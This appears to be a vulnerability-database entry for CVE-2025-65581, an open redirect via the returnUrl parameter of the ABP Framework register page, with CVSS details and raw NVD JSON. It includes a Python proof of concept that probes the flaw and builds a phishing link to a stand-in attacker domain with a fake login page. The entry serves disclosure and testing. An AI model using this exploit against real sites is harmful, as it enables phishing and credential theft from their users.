Security Vulnerability Report
中文
CVE-2025-65581 CVSS 5.3 MEDIUM

CVE-2025-65581

Published: 2025-12-16 18:16:15
Last Modified: 2026-01-07 21:00:11
Source: [email protected]

Description

An open redirect vulnerability exists in the Account module in Volosoft ABP Framework >= 5.1.0 and < 10.0.0-rc.2. Improper validation of the returnUrl parameter in the register function allows an attacker to redirect users to arbitrary external domains.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:volosoft:abp:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:volosoft:abp:10.0.0:rc1:*:*:*:*:*:* - VULNERABLE
Volosoft ABP Framework >= 5.1.0
Volosoft ABP Framework < 10.0.0-rc.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-65581 PoC - ABP Framework Open Redirect # Target: Volosoft ABP Framework >= 5.1.0 and < 10.0.0-rc.2 def test_open_redirect(target_url, redirect_target): """ Test for open redirect vulnerability in ABP Framework register function. Args: target_url: Base URL of the vulnerable ABP Framework application redirect_target: Malicious URL to redirect users to Returns: bool: True if vulnerability is confirmed """ # Construct the malicious URL with open redirect payload # The returnUrl parameter is not properly validated params = { 'returnUrl': redirect_target } # Target the register endpoint in Account module endpoint = f"{target_url.rstrip('/')}/Account/Register" try: # Send GET request to check if returnUrl is reflected in response response = requests.get(endpoint, params=params, allow_redirects=False, timeout=10) # Check if the response contains a redirect to the malicious URL if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') if redirect_target in location or redirect_target in response.text: print(f"[+] VULNERABLE: Open redirect confirmed!") print(f"[+] Redirects to: {location}") return True # Alternative check: Look for the returnUrl in the response if redirect_target in response.text: # Check if it's in a redirect context if 'window.location' in response.text or 'redirect' in response.text.lower(): print(f"[+] VULNERABLE: Open redirect found in response!") return True print("[-] Not vulnerable or endpoint not found") return False except requests.RequestException as e: print(f"[-] Error: {e}") return False def generate_phishing_url(base_url): """ Generate a phishing URL that exploits the open redirect. Args: base_url: The legitimate ABP Framework site URL Returns: str: The malicious URL for phishing campaigns """ phishing_domain = "attacker-controlled-site.com" malicious_url = f"{base_url}/Account/Register?returnUrl=https://{phishing_domain}/fake-login" return malicious_url # Example usage if __name__ == "__main__": # Replace with actual target URL target = "https://vulnerable-abp-site.com" # Test for open redirect is_vulnerable = test_open_redirect(target, "https://evil.example.com") if is_vulnerable: # Generate phishing URL phishing_url = generate_phishing_url(target) print(f"[*] Phishing URL: {phishing_url}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65581", "sourceIdentifier": "[email protected]", "published": "2025-12-16T18:16:14.820", "lastModified": "2026-01-07T21:00:11.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An open redirect vulnerability exists in the Account module in Volosoft ABP Framework >= 5.1.0 and < 10.0.0-rc.2. Improper validation of the returnUrl parameter in the register function allows an attacker to redirect users to arbitrary external domains."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:volosoft:abp:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.1.0", "versionEndExcluding": "10.0.0", "matchCriteriaId": "8F68981D-CAA8-4BA3-8BFF-B9F10240138A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:volosoft:abp:10.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "DB4A9285-ACAD-4F54-8F19-4F9F23A23372"}]}]}], "references": [{"url": "https://github.com/abpframework/abp/commit/44a2dc14e933f3ce1ca93f9313d836694ab77d1d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/abpframework/abp/commit/a01adc58464d278ca817c4bbb6cbce30f155d0d1", "source": "[email protected]", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.